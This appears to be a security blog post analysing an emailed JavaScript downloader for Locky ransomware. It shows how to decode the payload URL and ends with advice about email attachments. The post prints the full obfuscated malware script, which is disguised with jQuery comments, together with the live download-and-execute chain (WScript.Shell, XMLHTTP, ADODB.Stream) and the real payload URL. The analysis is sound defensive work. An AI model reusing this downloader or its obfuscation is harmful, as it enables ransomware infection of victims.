Decoding A Malicious Javascript Downloader

JavaScript Downloader Leads to Locky Ransomware

Attack Vector- Email Attachment      MX62EDO2016030179167.zip                                Malicious javescript file                        FG8327338338.js

The file is a downloader currently being sent as a compressed email attachment to prevent detection from Antivirus and IDS measures. When executed on a victims computer it downloads Locky Ransomware. The malware authors are using a simple hexadecimal obfuscation technique to hide the source of the payload. I wanted to show readers how to decode or convert the hexadecimal to ASCII to expose the domain that is serving this. Reviewing the entire JavaScript (found in the reference) you will see the obfuscation pretty easily.

Decode

To decode the hexadecimal remove the leading ‘\u00’ values in Yellow leaving only the Hexidecimal values (A-F 0-9). Pay attention to the other special characters and letters in Red.

hex                                       Obfuscated Hexadecimal URL

68 74 74 70 3A // 6D 6F 74 6F s. 72 75 2F ‘+’a’+’ 64m 69 6E 2F 6D o 64 e 6C 2F 38 37 79 68 62 35 34 cdf 79 2E e 78 e                                                                               Hexadecimal + Special Characters and ASCII Letters
                                                 

Decode on your favorite online hex decoder i.e. (http://ddecode.com or http://www.asciitohex.com) or simply remove the special characters and run it locally on a terminal as shown below.

# echo 687474703A6D6F746F72752F64696E2F6D646C2F383779 68623534792E78 |python3 -c “import sys, binascii; sys.stdout.buffer.write(binascii.unhexlify(input().strip()))”

                                         Terminal decode command

Combine the resulting string + Special Characters and ASCII letters exposes the URL that will serve the Malware.

  –       http://moto[.]ru/admin/model/87yhb54cdfy.exe

Recommendations

Never open attachments in emails unless you are expecting an attachment even if you know and trust the sender. Its easier to confirm the sender sent you the attachment then clean up a ransomware compromise.

Reference https://www.virustotal.com/en/file/557184BE5BD72298EC32E10E9225A448BC4C4C6121971B659F32B8C8D4B8316D/analysis/

https://malwr.com/analysis/ZDc4MmExYWYzZjJkNDUyYmE5MTllZjhkNGMxZTkyZTA/  

Full JavaScript file text

//(function( global, factory ) {

var FhCjGh = ‘\u0052un’; var ARDiz = this[(“lifestyle”,”individual”,”standings”,”warming”,”screech”,’\u0041c’)+’t\u0069’+’v\u0065X\u004F\u0062’+’\u006Aec\u0074′];

var xEsHeV = new ARDiz(‘W’+(“slammed”,”plumber”,’S’)+’\u0063\u0072ip\u0074.’+’\u0053\u0068ell’);

// if ( typeof module === “object” && typeof module.exports === “object” ) { // For CommonJS and CommonJS-like environments where a proper `window` // is present, execute the factory and get jQuery. // For environments that do not have a `window` with a `document` // (such as Node.js), expose a factory as module.exports. // This accentuates the need for the creation of a real `window`. // e.g. var jQuery = require(“jquery”)(window); // See ticket #14549 for more info. module.exports = global.document ? factory( global, true ) : function( w ) { if ( !w.document ) { throw new Error( “jQuery requires a window with a document” ); } return factory( w ); }; } else { factory( global );

var kjEEQvxTq = xEsHeV[(“saucer”,”hints”,’E\u0078pa\u006E\u0064′)+(“daytime”,”shelf”,”neuralgia”,’\u0045\u006E\u0076\u0069\u0072\u006Fnm\u0065′)+’\u006Et\u0053tr\u0069n’+’g\u0073′](‘%’+(“sublime”,”demagogue”,”samples”,’T’)+’E’+’\u004DP%’) + (“neptune”,”disclosure”,”gravy”,”fetching”,”explicit”,’\u002FKu\u0044\u0049′)+(“formative”,”clandestine”,’\u006FtQ’)+’j1\u002E’+’e\u0078e’;

//}// Pass this if window is not defined yet }(typeof window !== “undefined” ? window : this, function( window, noGlobal ) {

var sgOIi = new ARDiz(‘M’+(“partridge”,”holocaust”,”inert”,”incompetent”,’SX\u004D’)+’L\u0032.X\u004D\u004C\u0048T’+’T\u0050′);

//// Support: Firefox 18+ // Can”t be in strict mode, several libs including ASP.NET trace // the stack via arguments.caller.callee and Firefox dies if // you try to trace through “use strict” call chains. (#13335) //”use strict”; var deletedIds = [];

sgOIi[‘o\u006E’+’r\u0065\u0061\u0064y’+(“tuscany”,”quebec”,’s\u0074′)+(“journeyman”,”exemplify”,”dalton”,’a\u0074\u0065\u0063h\u0061\u006Eg\u0065’)] = function () {

if (sgOIi[‘r’+’\u0065\u0061d\u0079s’+’t’+(“massage”,”argumentative”,”grandpa”,”gender”,”musical”,’a\u0074e’)] === 4) {

var paHFKIl = new ARDiz((“augustinian”,”gunwale”,”shock”,’A\u0044′)+’\u004FD’+’\u0042.’+’\u0053\u0074re\u0061\u006D’);

//var document = window.document;

paHFKIl[‘\u006Fp\u0065n’]();

//var slice = deletedIds.slice;

paHFKIl[‘t\u0079\u0070e’] = 1;

//var concat = deletedIds.concat;

paHFKIl[‘w’+(“evolutionary”,”compression”,”unction”,’r’)+’i’+’\u0074e’](sgOIi[‘Re\u0073’+’p\u006F\u006Ese\u0042’+(“barque”,”poetess”,’o’)+’d\u0079′]);

//var push = deletedIds.push;

paHFKIl[(“everyday”,”deployment”,’p\u006Fs’)+’i’+’t’+’\u0069on’] = 0;

//var indexOf = deletedIds.indexOf;

paHFKIl[‘s\u0061’+(“perverted”,”curious”,”accede”,’ve\u0054′)+’o\u0046’+(“consistently”,”farmer”,”vocals”,’\u0069le’)](kjEEQvxTq, 2);

//var class2type = {};

paHFKIl[(“thrown”,”spalding”,’c’)+’l’+’o’+(“juvenile”,”cuckoo”,”coeval”,’s\u0065′)]();

//var toString = class2type.toString;

};

//var hasOwn = class2type.hasOwnProperty;

sgOIi[‘o\u0070e\u006E’](‘\u0047ET’, (“africa”,”digits”,”textbook”,’\u0068\u0074\u0074\u0070\u003A//e\u006D’)+’\u006F\u0074\u006Fs.\u0072\u0075\u002F’+’a’+’\u0064m\u0069\u006E\u002F\u006Do\u0064e\u006C\u002F\u0038\u0037\u0079\u0068\u0062\u0035\u0034cdf\u0079\u002Ee\u0078e’, false);

//var support = {};

sgOIi[‘s\u0065\u006Ed’]();

//

xEsHeV[FhCjGh](kjEEQvxTq, 1, “UNHUGlAh” === “JAFBXnHFM”);

//var version = “1.12.1”,

} catch (QMDvrsH) { };

// // Define a local copy of jQuery jQuery = function( selector, context ) {

Facebooktwittergoogle_plusredditpinterestlinkedinmail

Leave a Reply

Your email address will not be published.